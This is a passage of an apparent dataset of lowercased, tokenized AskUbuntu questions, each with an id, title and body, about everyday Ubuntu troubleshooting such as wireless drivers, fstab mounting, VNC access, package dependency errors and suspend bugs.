] [ size=128k ] capabilities : < access denied > kernel driver in use : fglrx_pci 07:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5289 ( rev 01 ) subsystem : hewlett-packard company device 1895 flags : bus master , fast devsel , latency 0 , irq 42 memory at 61600000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : rtsx_pci 07:00.2 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 0a ) subsystem : hewlett-packard company device 1895 flags : bus master , fast devsel , latency 0 , irq 43 i/o ports at 2000 [ size=256 ] memory at 61404000 ( 64-bit , prefetchable ) [ size=4k ] memory at 61400000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 08:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) subsystem : hewlett-packard company device 1795 flags : bus master , fast devsel , latency 0 , irq 17 memory at 61500000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : bcma-pci-bridge blacklist.conf krishna @ krishna-hp-envy-4-notebook-pc : ~ $ cat /etc/modprobe.d/blacklist.conf # this file lists those modules which we do n't want to be loaded by # alias expansion , usually so some other driver will be loaded for the # device instead . # evbug is a debug tool that should be loaded explicitly blacklist evbug # these drivers are very simple , the hid drivers are usually preferred blacklist usbmouse blacklist usbkbd # replaced by e100 blacklist eepro100 # replaced by tulip blacklist de4x5 # causes no end of confusion by creating unexpected network interfaces blacklist eth1394 # snd_intel8x0m can interfere with snd_intel8x0 , does n't seem to support much # hardware on its own ( ubuntu bug # 2011 , # 6810 ) blacklist snd_intel8x0m # conflicts with dvb driver ( which is better for handling this device ) blacklist snd_w2 # causes failure to suspend on hp compaq nc6000 ( ubuntu : # 10306 ) blacklist i2c_i801 # replaced by p54pci blacklist prism54 # replaced by b43 and ssb . # blacklist bcm43xx blacklist wl # most apps now use garmin usb driver directly ( ubuntu : # 114565 ) blacklist garmn_gps # replaced by asus-laptop ( ubuntu : # 184721 ) blacklist asus_acpi # low-quality , just noise when being used for sound playback , causes # hangs at desktop session start ( ubuntu : # 246969 ) blacklist snd_pcsp # ugly and loud noise , getting on everyone 's nerves ; this should be done by a # nice pulseaudio bing ( ubuntu : # 77010 ) blacklist pcspkr # edac driver for amd76x clashes with the agp driver preventing the aperture # from being initialised ( ubuntu : # 297750 ) . blacklist so that the driver # continues to build and is installable for the few cases where its # really needed . blacklist amd76x_edac
366428	the monospace font rendering is broken	the monospace font renderer seems to have problem with rendering monospace fonts , especially with ubuntu mono font . some line 's width is different . it seems like the font is shrinked to half size when there is no alphabet in the line . i confirmed that it only occurs if the language is not english . the system default locale is set to kr ( of course it is not kp hehehe ) with the locale set to korean : the line without alphabet is displayed correctly , but alphabets are not . the selection is even more strange . with the locale set to english :
366429	ndiswrapper : lose all internet connection after restart	i am able to obtain wifi the first time i install ndiswrapper . but after i restart , i do n't have a internet connection and i can not see any of the wireless internet connections ( when one clicks the bottom right internet icon in lubuntu 13.04 ) after installing a fresh lubuntu 13.04 and a wired connection , i have done sudo apt-get install ndisgtk sudo apt-get install ndiswrapper-dkms sudo modprobe ndiswrapper sudo nano /etc/modules and add ndiswrapper on a new line start - > system tools - > windows wireless drivers - > install new driver- > find the .inf file in the extracted driver folder then i am not sure but somehow i manage to get my wireless working via the internet icon on the bottom right . but after i restart , it all goes away . i have already tried this
366430	12.04 desktop sharing black screen	i know there has to be a simple excuse for this i have however been unable to find it i have used ubuntu for quite some time and until 12.04 any time i needed vnc access to a ubuntu desktop i simply enabled desktop sharing and i could get to from anywhere . in 12.04 and newer i have been unable to make this work all i get is a black screen . i have tried multiple clients on ubuntu , slackware , windows , and android with no luck . thanks wayne
366431	update manager stuck or froze , computer shut off	i was updating to saucy and while it was installing it froze or stuck so i let it sit for a while . when i came back the battery had died . i turned my laptop back on and started ubuntu . now it does n't show the search bar and no controls work i.e . `` ctrl+alt+t '' need help restoring
366432	do programs and binaries use all cores by default in ubuntu 12.04 ?	i am running ubuntu 12.04 on a intel core 2 duo processor @ 2.4 ghz with 4 gb ram . my question is that by default , do my programs and binaries ( namely vlc , firefox , pidgin etc. ) run on a single core , or do they run on all available cores ( multithreading ) ? if they use a single core by default , can you tell me how i can make the default setting so that they run on all cores by default ? assumption : one thread is allocated by cpu core for running a program . the reason i am asking this question is that my computer slows down significantly when i run a mkv format file on vlc ; or when i have many tabs open on firefox . i wish to make the default setting for programs , to use all available cores . i hope doing this will decrease the delays .
366434	kill processes from another user	i have set up ubuntu server as a vm , and think i 've installed vnc on it ; however , i have been trying for a while . when i could n't connect using the vnc from any other machine , on both the same lan and through a natted router . i installed a vnc viewer on the same server to try and connect to 127.0.0.1 . that did not work , so now i can only log on as guest , so i want to kill the process that is running on the single main account i set up . i have the password for my account but when i try and log on - it just goes back to the log on .
366437	unable to mount hard drives in /etc/fstab	i am following along in the docs for installing a new hard drive ( the drives are formatted and have data , i 'm trying to set up in /etc/fstab ) i 'm able to mount normally with sudo mount /dev/sdb1 /media/photos when trying to enter into /etc/fstab like so : /dev/sdb1 /media/photos vfat defaults 0 0 i get this : ~ $ sudo mount -a [ sudo ] password for jason : mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so i tried several variations , like ext3 , some of the other options listed in the docs , chaning permissions of the mount point , but always got the same error . i should also mention this machine is dual booted with win8 and the partitions were created in windows , quite some time ago . ( have actually re-installed the os , both win and ubuntu several times and used these data drives ) from fdisk -l : device boot start end blocks id system /dev/sdb1 2048 976769023 488383488 7 hpfs/ntfs/exfat and from lshw -c disk : *-disk description : ata disk product : wdc wd5000aaks-0 vendor : western digital physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/sdb version : 01.0 serial : wd-wmasy5272327 size : 465gib ( 500gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=512 signature=9eb34acb any ideas as to what i 'm doing wrong ? ? thanks ! bp
366438	how to install google-earth 64bit in ubuntu 13.10 , ia32-libs dependency error	i want to install google-earth & it requires ia32-libs . so , i did apt-get install ia32-libs but error pops as reading package lists ... done building dependency tree reading state information ... done package ia32-libs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : lib32z1 lib32ncurses5 lib32bz2-1.0 how to install ia32-libs ? help please . thank you .
366444	unity error : no default decoration found , placement will not be correct	after typing unity in the terminal to reset my top task bar , it loads correctly , but i get this stacktrace in the terminal : warn 2013-10-26 19:36:49 unity.glib.dbus.server glibdbusserver.cpp:586 ca n't register object 'com.canonical.autopilot.introspection ' yet as we do n't have a connection , waiting for it ... warn 2013-10-26 19:36:49 unity.glib.dbus.server glibdbusserver.cpp:586 ca n't register object 'com.canonical.unity.debug.logging ' yet as we do n't have a connection , waiting for it ... warn 2013-10-26 19:36:49 xim.controller ximcontroller.cpp:90 ibus natively supported . warn 2013-10-26 19:36:49 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/google-chrome.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-10-26 19:36:49 unity.glib.dbus.server glibdbusserver.cpp:586 ca n't register object 'com.canonical.unity.launcher ' yet as we do n't have a connection , waiting for it ... warn 2013-10-26 19:36:50 unity.glib.dbus.server glibdbusserver.cpp:586 ca n't register object 'com.canonical.unity.dash ' yet as we do n't have a connection , waiting for it ... warn 2013-10-26 19:36:50 unity.glib.dbus.server glibdbusserver.cpp:586 ca n't register object 'org.gnome.sessionmanager.endsessiondialog ' yet as we do n't have a connection , waiting for it ... compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct it still works fine , but i would like to know what this is about . thanks
366446	get macro keys on steelseries apex ( keybord ) to work	i just got a new keyboard but none of the macro keys work when going into the keymapping of games they do n't see the macro keys . i saw this app `` xmacro '' but i could n't get it to work . is it possible to set macro keys without `` steelseries engine '' ( mac , windows ) ?
366447	bluetooth mouse contstantly failes to reconnect after sleep	it seems the bluetooth subsystem shows some bugs after the upgrade to 13.10 . it was working quite happily at 13.04 . the bluetooth mouse i have , simply wo n't connect after the computer goes into any sort of sleep and has to be re-added each and every time . sometimes the the entire bluetooth stack has vanished alltogether . what changed with the bluetooth between these versions , that may cause this ? this is a fresh install of kubuntu i 'm using ( bluedevil ) no an upgrade , but the same hardware as 13.04 was happy on . i have reported this as a bug https : //bugs.launchpad.net/ubuntu/+source/bluez/+bug/1246981 and added the link here as requested .
366453	parental controls	just updated my son 's pc with saucy & wondered if there is a simple way of adding parental controls to it ? i looked into dansguardian but i do n't have a server ... and i 'm not well versed in configuring the program ( i actually caused the pc to boot up & then go right into standby mode & ended up having to completely re-install ubuntu in order to resolve it ) . is there something simple & easy to use/install like windows family safety or norton family safety without all configuring ( like opendns ) ?
366460	error loading yumi on ubuntu 13.04	i installed yumi on ubuntu 13.04.when i run yumi , it shows the following error . drive /dev/sdb1 ( new\\x20vo ) is not mounted in /media . please mount usb via file manager and restart yumi .
366461	troubles with permissions of a new user	i want to create a new user and give him possibility to use git . so , i 've installed git : sudo apt-get install git after that i 've created a user : sudo useradd -d /home/developer -s /bin/bash -g sudo -m developer and now i have a problem . when i switch to a new user and try to do something like this : git clone < < here is a path > > i get this error message : fatal : unable to access '/home/roman/.config/git/config ' : permission denied i ca n't get why environment variables points to another user folders and what is the good way to fix it . i also believe that i did n't specify something properly during creation of a new user ( that is why environment variables have not proper values ) . the same problem appears when i try for instance to run mc ... i get this : can not create /home/roman/.config/mc directory for more information have this cat /etc/passwd | grep developer developer : x:1001:27 : :/home/developer : /bin/bash so , can somebody explain me how to solve my problems ?
366462	most up to date ipython and matplotlib in ubuntu 13.10	i 've recently updated my ubuntu to the 13.10 version . to my surprise , ipython and matplotlib are available only in versions prior to those i had in my previous 12.04 lts install . when with the 12.04 , i had the julian taylor ppa set up in my repositories , and that 's why ( i think ) i had most up-to-date versions from both packages . the versions currently in 13.10 are : matplotlib : 1.2.1 ( http : //matplotlib.org/index.html , most current version is 1.3.1 ) ipython : 0.13.2 ( http : //ipython.org , most current version is 1.1.0 â september 2013 ) is there any ppa available for the 13.10 ? the jtaylor ppa covers only as far as 12.10 ( quantal , link not available due to reputation rank in stack exchange ) should i install those packages outside apt ? is n't that troublesome ?
366463	how do i get xubuntu to use my mouse size/theme settings everywhere ?	i 'm really enjoying xubunut , except for one thing - the only time it obeys my mouse size/theme settings is when i 'm not in a system tool or application . by default , the mouse cursor size is pretty large , and i changed to size to 16 , but it still looks like 24 at least . has anyone else come across this , and know of a fix ? thanks !
366465	issue restarting after changing /etc/network/interfaces to a static ip ubuntu 12.04.3 lts	i 've been trying to set up a static ip address on my new ubuntu build ( 12.04.3 lts ) . i changed the following lines in my /etc/network/interfaces file from : auto eth0 iface eth0 inet dhcp to : auto eth0 iface eth0 inet static address xxx.xxx.xxx.xxx gateway xxx.xxx.xxx.xxx netmask xxx.xxx.xxx.xxx where the x 's are my assigned static ip address , gateway , and netmask . this works fine , and i 'm able to connect to the internet . however , when i restart , the purple screen comes up for a second , disappears , and then a black screen with flashing white underscore comes up . to resolve this , i 've had to modify the grub bootloader settings to nomodeset when restarting so that i can get to the desktop . if it helps , i 'm booting off a solid-state drive . does anyone know how i can set up a static ip address without compromising my computer 's boot-up sequence , or even better , does anyone know why this is occuring ? please let me know if i can provide any additional information ! i 'm relatively new to all this and help is greatly appreciated : )
366466	installing ubuntu on btrfs over multiple drives	when i installed ubuntu 13.04 , i managed to combine a couple of outdated askubuntu answers , as well as some of the btrfs documentation in order to figure out how to install ubuntu over two ssds using a single btrfs partition ( i think /boot was on a small ext4 partition ) . i want to install ubuntu 13.10 in a similar way , using a single btrfs partition striping data over the two ssds , but i do n't feel comfortable synthesizing a method that i am sure will work with current software . what is the best way to partition and install ubuntu over two ssds using btrfs , in an effectively raid 0 way ?
366469	how to remove launchpad app/webapp ?	i was browsing launchpad and it asked to install a helper app . i thought that this was the firefox extension so i said yes . now i have this launcher app that will open a firefox window directly to launchpad from my unity dash . i want to remove it and i ca n't . i removed the firefox extension and it 's still there . i removed the unity webapps firefox extension and it 's still there . i tried to purge `` launchpad '' and my system says that it does n't exist . i searched launchpad for information on this app but found nothing i could understand that seemed to be relevant . but it 's still there , staring at me from the unity dash . can anyone help me get this thing out of my system ? running ubuntu 13.10 i tried this question but it did n't work : how do i remove a website from ubuntu 's web applications ? `` package 'unity-webapps-launchpad ' is not installed , so not removed '' and the launchpad firefox launcher icon is still in the dash . any other ideas ?
366471	possible to upgrade 12.04- > 12.10 , not 13x ?	can i upgrade to a specific version , rather than to whatever 's newest ? i 've a driver to install which requires 12.10 . thanks in advance .
366476	ubuntu 13.10 acer aspire 5733-6607 built in mic static	hello first time asking a question here . so if i miss something let me know . anyway , just installed ubuntu 13.10 64-bit . have it running great its just that when i go to make a skype test call to make sure my mic is working there is a huge ammmount of static . i can hear myself talking and i can make out what was said and everything just a lot of static . i am new to ubuntu for the most point . played around with ubuntu some what so i know that basics for the most part . anyway does anyone know how to fix it ? thanks in advance -kristopher
366477	hdmi error `` no signal '' from tv but it 's recognized by ubuntu	i 'm running ubuntu 13.04 on an asus laptop . my graphics driver is mobile intel gm45 express chipset x86/mmx/sse2 . i was watching tv through my hdmi cable last night , and i 've used this same setup with numerous old distributions . i upgraded to ubuntu 13.04 a few days ago , and the hdmi output has been working better than before . this morning it stopped . i tried replacing the hdmi cable and trying different inputs on my tv . the tv just displays a floating no signal box , but ubuntu sees the tv in the displays settings , and if i turn the tv off , my laptop screen flashes black and the tv display options disappear . i have no clue what happened or what to do next . here 's the output from xrandr -- verbose for hdmi1 when the tv is hooked up : hdmi1 connected ( normal left inverted right x axis y axis ) identifier : 0x43 timestamp : 2051272 subpixel : unknown gamma : 1.0:1.0:1.0 brightness : 1.0 clones : crtc : 1 crtcs : 0 1 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : edid : 00ffffffffffff006a4e020302000000 2511010380321e000a9203a256489925 144a4d21080001010101010101010101 010101010101662150b051001b304070 3600c58f2100001e8c0ad08a20e02d10 103e9600f41911000018000000fc005a 4f52414e204d41545249580a000000fd 003b3d0f2e0f000a20202020202001c8 02031a71470584030201070626090707 15075066030c00100080011d007251d0 1e206e285500f4191100001e8c0ad08a 20e02d10103e9600902d11000018011d 8018711c1620582c2500f4191100009e 8c0aa01451f01600267c4300f4191100 00988c0aa01451f01600267c4300902d 110000980000000000000000000000cc broadcast rgb : full supported : full limited 16:2 audio : auto supported : force-dvi off auto on 1360x768 ( 0xc7 ) 85.5mhz +hsync +vsync +preferred h : width 1360 start 1424 end 1536 total 1792 skew 0 clock 47.7khz v : height 768 start 771 end 777 total 795 clock 60.0hz 1920x1080i ( 0xc8 ) 74.2mhz +hsync +vsync interlace h : width 1920 start 2008 end 2052 total 2200 skew 0 clock 33.8khz v : height 1080 start 1084 end 1094 total 1125 clock 30.0hz 1280x720 ( 0xc9 ) 74.2mhz +hsync +vsync h : width 1280 start 1390 end 1430 total 1650 skew 0 clock 45.0khz v : height 720 start 725 end 730 total 750 clock 60.0hz 1024x768 ( 0x4a ) 65.0mhz -hsync -vsync h : width 1024 start 1048 end 1184 total 1344 skew 0 clock 48.4khz v : height 768 start 771 end 777 total 806 clock 60.0hz 1440x480i ( 0xca ) 27.0mhz -hsync -vsync interlace h : width 1440 start 1478 end 1602 total 1716 skew 0 clock 15.7khz v : height 480 start 488 end 494 total 525 clock 30.0hz 1440x480i ( 0xcb ) 27.0mhz -hsync -vsync interlace h : width 1440 start 1478 end 1602 total 1716 skew 0 clock 15.7khz v : height 480 start 488 end 494 total 525 clock 30.0hz 800x600 ( 0x4b ) 40.0mhz +hsync +vsync h : width 800 start 840 end 968 total 1056 skew 0 clock 37.9khz v : height 600 start 601 end 605 total 628 clock 60.3hz 720x480 ( 0xcc ) 27.0mhz -hsync -vsync h : width 720 start 736 end 798 total 858 skew 0 clock 31.5khz v : height 480 start 489 end 495 total 525 clock 59.9hz 640x480 ( 0xcd ) 25.2mhz -hsync -vsync h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 490 end 492 total 525 clock 60.0hz 640x480 ( 0x4d ) 25.2mhz -hsync -vsync h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 490 end 492 total 525 clock 59.9h
366479	ubuntu server ssd primary os , user data/home folders on secondary raid1	i have a 60gb ssd drive that i want ubuntu server 13 installed upon , and user home folders ( except for root ) automatically redirected to a secondary raid1 array . each hard drive in the array is 2tb . when creating the user accounts , i know i can specify where the home folders are . however , i 'd like for the /home folder to point to the raid1 array . i had the os installed on the raid1 array just fine , then the update to 13.10 killed it . i 've since come into 2 60gb ssd drives and i want to use one of them for the os and the raid1 array to host user home folders . eventually , i 'll add smb sharing to the raid1 array as well , but migrating the user home folders to the array is primary concern . how can i set this up ?
366486	modify grub.conf for ubuntu partition	i was using this thread how to modify grub.conf for ubuntu partitionto solve a problem in getting my y500 to boot after a new install , and ran into a problem . i was able to use sudo mount /dev/sdb8 /mnt/newinstall to get to the next line , but after i typed in sudo vi /mnt/newinstall/boot/grub/grub.conf and put in w : ! it said that this is a `` new file '' . where is the grub.conf so i can edit it ? original guide unable to install ubuntu on lenovo y500 i need to change the screen res to 1920x1080 since my graphics card is not supported ( nvidia 750m ) thanks
366487	apt-get unmet dependencies apache2 mod-auth-mysql	after updating from ubuntu 11.10 to 12.04 i got some package dependency errors with apache and the mod_mysql_auth : root @ ks3275586 : /etc/apache2 apt-get install libapache2-mod-auth-mysql reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libapache2-mod-auth-mysql : depends : apache2.2-common ( > = 2.2.3-3 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . content of the /etc/apt/sources.list # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //ubuntu.mirrors.ovh.net/ftp.ubuntu.com/ubuntu/ precise main restricted deb-src http : //ubuntu.mirrors.ovh.net/ftp.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //ubuntu.mirrors.ovh.net/ftp.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //ubuntu.mirrors.ovh.net/ftp.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //ubuntu.mirrors.ovh.net/ftp.ubuntu.com/ubuntu/ precise universe deb-src http : //ubuntu.mirrors.ovh.net/ftp.ubuntu.com/ubuntu/ precise universe deb http : //ubuntu.mirrors.ovh.net/ftp.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //ubuntu.mirrors.ovh.net/ftp.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //ubuntu.mirrors.ovh.net/ftp.ubuntu.com/ubuntu/ precise multiverse deb-src http : //ubuntu.mirrors.ovh.net/ftp.ubuntu.com/ubuntu/ precise multiverse deb http : //ubuntu.mirrors.ovh.net/ftp.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //ubuntu.mirrors.ovh.net/ftp.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //ubuntu.mirrors.ovh.net/ftp.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //ubuntu.mirrors.ovh.net/ftp.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu oneiric partner # deb-src http : //archive.canonical.com/ubuntu oneiric partner # # uncomment the following two lines to add software from ubuntu's # # 'extras ' repository . # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu oneiric main # deb-src http : //extras.ubuntu.com/ubuntu oneiric main deb http : //ftp.osuosl.org/pub/mariadb/mariadb-5.5.32/repo/ubuntu precise main deb-src http : //ftp.osuosl.org/pub/mariadb/mariadb-5.5.32/repo/ubuntu precise main deb http : //mirrors.n-ix.net/mariadb/repo/5.5/ubuntu precise main deb-src http : //mirrors.n-ix.net/mariadb/repo/5.5/ubuntu precise main has someone a suggestion what could be done ? thanks in advance
366492	sound indicator shows as muted in 13.10	as in the title , what has happened to it ? not that it is not working , albeit it is sort of annoying seeing that your computer 's volume is allegedly muted when it is not at all . please see the image below - this is how it looks like . there is no menu when i left click on it . screenshot : thanks for any kind of help ,
366493	is it possible to get the normal login screen when resuming from suspend ?	i noticed that the login screen that i get when the system first boots up is different from the login screen i see after i resume from suspend . i 'm wondering if it is possible to get the same login screen that i saw when it first booted up as the one i get when i resume the system from suspend . i think the first boot login one is called lightdm greeter or something , not sure about the second one .
366495	partitioning in a dell 660s while installing ubuntu	when i chose a partition and clicked install now while ubuntu setup was running , it says 'no root file system is defined . please correct it from the partition menu.can anyone help ?
366503	wireless issues bcm4311	i have been working with a nice gent but i am getting stuck . i am just getting back in to linux and ubuntu was recommended . i like the look so far but the wireless is n't working i run the update and when it says complete it hangs at the end . please let me know what to do at this point . `` wl : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.11.0-12-generic/updates/dkms/ depmod ... . dkms : install completed . '' hangs here ! ! thanks for all your help , d.c .
366504	error installing gpodder	a few weeks ago ( newbie alert ! ) i started using xubuntu 12.04 with xfce 4.8 . i 'm trying to install gpodder podcast client ( see https : //launchpad.net/~thp/+archive/gpodder ) . i 've added the ppa via terminal commands as instructed . when i click the install button in the ubuntu software centre i get the following error : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . details : the following packages have unmet dependencies : gpodder : depends : python-webkit but it is not going to be installed what do i need to do ? just to make thing more complicated -- i 'm not sure , but before i found the launchpad.net link , i think i may have tried to install gpodder from the default ubuntu repositories ( also unsuccessfully ) . there may be remnants of the previous attempt still installed , which may be blocking the new install . where/how can i find them ?
366505	how to start remote desktop service in ubuntu 13.10 ?	i 'm only able to remotely connect to my ubuntu box after it 's logged in using vnc viewer on my windows box . how do i setup ubuntu so that it starts the remote desktop service at boot up ?
366506	deleting old tomcat version and setting a new one	i had apache tomcat installed by apt-get , however i decided to get a newer one , performed apt-get remove tomcat7 and apt-get purge tomcat7 . i installed a newer one means the bundled tomcat server in netbeans install . however , im still seeing the old fashioned page from former tomcat install : it works ! if you 're seeing this page via a web browser , it means you 've setup tomcat successfully . congratulations ! this is the default tomcat home page . it can be found on the local filesystem at : /var/lib/tomcat7/webapps/root/index.html i already set a different port in the server.xml file and whenever i go that site after executing the startup.sh file with sudo permissions i 'm not getting any site like server ( new one ) is n't running . how can i still be getting the page from old tomcat install ! ? when i execute the startup.sh log says all is set ok , so why is n't it working ?
366508	have a missing file , and cant run ubuntu upon start up , and hasnt the flash drive i used didnt work either , any help ?	when i first downloaded ubuntu to install it , it downloaded quick and caused no problems to my laptop . but then when it came time to install it as one of my operating systems , it would n't run because it said a file was missing or damaged . so then i uninstalled it and re-installed it but i still had that same problem . so i tried a flash-drive version but that did n't work either because it would n't boot from that , nor would it detect my flash drive , ( in this case , an old 4 gb mp3 player ) . any help or tips and ideas would be great , i just need a decent operating system because windows is getting to be terrible at the moment , just note i wan na run ubuntu along side windows 8.1
366511	update to 13.10 : blank screen and repeated suspend on resume from suspend	on my asus x201e , after updating from 13.04 to 13.10 , intermittently when awaking from suspend , my screen will blink to a black screen a few times , offer a lock screen , and then go back to suspend unexpectedly ( during this it is possible to quickly login to the desktop before the system suspends again ) . this will repeat each time i subsequently awake it from suspend . only a restart will escape the suspend loop . the problem only occurs when suspending by closing lid , not by manual ( pm-suspend ) or menu suspend . opening the lid after a manual or menu-initiated suspend works as expected . when an external monitor is attached , the black screen and second lock screen still appear twice upon wake , but the system does not fall back into suspend ( though networking is disabled and needs to be restarted ) . this issue arose in tandem with the already raised issue regarding networking not restarting on wake from suspend , though appears to be distinct from that issue and persists after a fix is applied for the networking issue . this issue only occurs on waking from suspend , never upon booting . and only on the second suspend cycle after reboot . this question duplicates the second , unanswered question included in this closed question and seems to correspond with this reported bug . any ideas for a workaround ?
366514	certain keys stopped workin	turned on my ubuntu 12.04 lts laptop ( compaq ) and now the keys g , h , delete and apostrophe simply do not work . what to do ? i already did a full reinstall and tey still dont work , .
366515	how do i set up a single hard drive as a node on my maas server ?	i just set up a maas server and have hard drives within the physical server that i want to configure as nodes . how do i add them either through web interface or manually via the command line ?
366519	unstable icons in bottom toolbar and in menu	ubuntu 13.10 and earlier version 13.04 ? icons in the tool bar at bottom of screen are unstable and flicker on and off then change to solid white blocks . even the text above them is garbled when the mouse points at them . also none of the menu icons show up when menu ( bottom left corner ) is selected . if i restart the pc the bottom toolbar is restored but selecting menu causes the problem to return . everything was fine until a service update was installed and then it has never been right since . also an almost transparent pointed line appears diagonally across the screen occasionally . this is an hp notebook with a solid state drive installed and have been using ubuntu with it without a problem for about 5 months . thank you.. jim
366520	how to block all the interrupts in linux	i am working on a python project , where i am displaying a graphical window with log in screen , i 've also disabled the close , re size and minimize buttons my problem : i have to disable all the interrupts , including disabling system shortcuts like alt + tab , alt + f4 etc , so that user can log in only after entering the username and passwords on the screen . is there any linux command or any bash script is there ? platform : ubuntu thanks for any help !
366522	how to mount lacie ehd with existing data onto ubuntu 12.04	i recently bought a used computer with ubuntu 12.04 , i am new to this os and after reading a lot of forums about mounting issues i can find nothing that works for me as i can not format my ehd . when i try to mount the message i get is ... error mounting : mount exited with exit code 13 : $ mftmirr does not match $ mft ( record 0 ) . failed to mount '/dev/sdb1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . .
366523	ubuntu 13.04 wireless internet card is not being recognized	i recently install ubuntu 13.04 as a dualboot with windows 8 . i 'm fairly new to using ubuntu , and i do n't really know much about how to fix problems . for some reason , ubuntu thinks that i do not have a wic , even though i do and it works perfectly fine in windows 8 . because it does n't recognize that i have a wic , i ca n't have a wireless connection . i 've already searched this board for answers , but all the problems other people seem to have are n't quite the same as the problem i 'm having . i 've seen that ndiswrapper might help , but i do n't know if it would work in my situation . i 've also tried to look under proprietary drivers in the software management section , but absolutely nothing shows up . i really want to be able to use wifi with ubuntu because ethernet is a big hassle when using a laptop . is there anyway i can make wifi work ? my computer is a toshiba satellite c855d-s5351 , and my nic is a realtek rtl8723ae wireless lan 802.11n pci-e nic .
366524	crashplan wo n't install properly	i have downloaded an application called crashplan for backups . it comes with the install.sh script below . i ran it but received the following errors . how do i fix this ? install.sh : 31 : [ : x : unexpected operator install.sh : 100 : [ : xy : unexpected operator install.sh : 104 : [ : y : unexpected operator installing as current user install.sh : 127 : install.sh : [ [ : not found install.sh : 127 : install.sh : [ [ : not found install.sh : 127 : install.sh : [ [ : not found install.sh : 127 : install.sh : [ [ : not found install.sh : 127 : install.sh : [ [ : not found install.sh : 127 : install.sh : [ [ : not found install.sh : 127 : install.sh : [ [ : not found install.sh : 127 : install.sh : [ [ : not found install.sh : 138 : install.sh : [ [ : not found install.sh : 177 : install.sh : syntax error : `` ( `` unexpected ( expecting `` then '' ) install.sh file # ! /bin/bash # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # linux client installer script # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # variables defined in install.defaults # app_basename = human-readable application name # dir_basename = dir name # download_host = where to get the jre script_dir=`dirname $ { 0 } ` if [ ! -f `` $ { script_dir } /install.defaults '' ] ; then echo `` $ { script_dir } /install.defaults missing ! '' exit 1 fi . $ { script_dir } /install.defaults reqdbins= '' grep sed cpio gzip cut head tail who '' okjava= '' 1.5 1.6 1.7 '' targetdir=/usr/local/ $ { dir_basename } binsdir=/usr/local/bin manifestdir=/usr/local/var/ $ { dir_basename } initdir=/etc/init.d runlevel=`who -r | sed -e 's/^ . *\ ( run-level [ 0-9 ] \ ) . * $ /\1/ ' | cut -d \ -f 2` 